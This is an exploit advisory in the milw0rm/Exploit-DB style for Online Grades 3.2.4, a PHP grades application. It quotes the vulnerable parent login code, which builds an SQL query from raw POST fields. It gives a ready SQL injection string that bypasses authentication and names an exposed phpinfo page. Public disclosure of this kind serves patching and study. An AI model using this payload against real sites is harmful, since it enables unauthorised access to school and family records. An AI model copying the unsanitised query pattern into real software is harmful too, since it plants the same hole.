Online Grades 3.2.4 - Authentication Bypass

Author: x0r
type: webapps
platform: php
port: 
date_added: 2009-02-02 
date_updated:  
verified: 1 
codes: OSVDB-51713;CVE-2009-0479;OSVDB-51712;CVE-2009-0453;OSVDB-51711;CVE-2009-0452 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################################

    [0x01] Informations:
	Script : Online Grades 3.2.4
	Download : http://www.onlinegrades.org
	Vulnerability : Auth Bypass - Php Info Disclosure
	Author : x0r
	Contact : x0r@live.it \ andry2000@hotmail.it
	Website : NULL

#########################################################################################

    [0x02] Bug: /parents/login.php

	$username = $_POST['uname']; $pword = $_POST['pass'];
	$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";

#########################################################################################

    [0x03] Exploit:
	Exploit: [validemail] ' or ' 1=1--

	Php Info: /includes/phpinfo.php

#########################################################################################

# milw0rm.com [2009-02-03]